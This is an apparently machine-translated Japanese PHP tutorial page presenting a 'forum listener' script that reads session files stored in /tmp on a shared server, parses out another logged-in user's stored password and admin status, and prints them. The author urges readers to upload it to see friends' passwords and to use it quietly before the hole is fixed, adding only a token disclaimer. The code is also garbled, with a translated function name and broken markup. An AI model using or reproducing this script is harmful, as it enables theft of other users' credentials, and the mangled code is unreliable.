セッションコンテンツを表示するための不明なソフトウェア例外 php 関数-PHPチュートリアル-php.cn

セッションコンテンツを表示するための不明なソフトウェア例外 php 関数

WBOY

リリース： 2016-07-29 08:38:42

オリジナル

1245 人が閲覧しました

例: name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"、セッションが保存されている場所もわかっており、ファイルをアップロードできるため、そのとき、ちょっとしたハッキングをすると、オンラインの友達のパスワードが一目でわかります（笑）
global $username;
print "Forum Listener< ;/title>" ; $i=0; if($username=="tasm"||$username=="Tasm") { print "あなたも怪しいですか?"; return; } $path="/tmp/"; $d = dir($path); if(substr($entry,0) ,4) == "sess"){ $entry=$path.$entry; $ary=@file($entry); if(!empty($ary[0])){ $ary = 爆発("; ",$ary[0]); $name=explode(":",$ary[0]); if($name[2]==""".$username."") { $ passwd=explode(":",$ary[1]); $mode=explode(":",$ary[3]); print "ユーザーのペンネーム:".$name[2]。 " ;使用パスワード: ".$passwd[2]。" 使用モード:"; if($mode[1]==1) print "管理者 ;"; else print "一般ユーザー"; print" 他人のパスワードを盗むのは非倫理的です、やめてください "; $i=1; break; }}}} if(!$i) print "User:".$username." 本当にオンラインですか? 確かな場合は、<a >もう一度来てください</a>、入力しないでくださいもっとスペース! "; $d->close(); } function login(){ ?> <html> <head> <title>フォーラムリスナー
< ; meta http-equiv="Content-Type" c border="0" cellpacing="0" cellpadding="0">
オンライン中に彼のパスワードを確認したい場合はどうすればよいでしょうか?

言っておきますが、このプログラムを使用してください。

を厳粛に宣言します。私には責任がありません。

ただし、この問題はすぐに解決されるかもしれないので、公表せずにこっそり使用したほうがよいでしょう。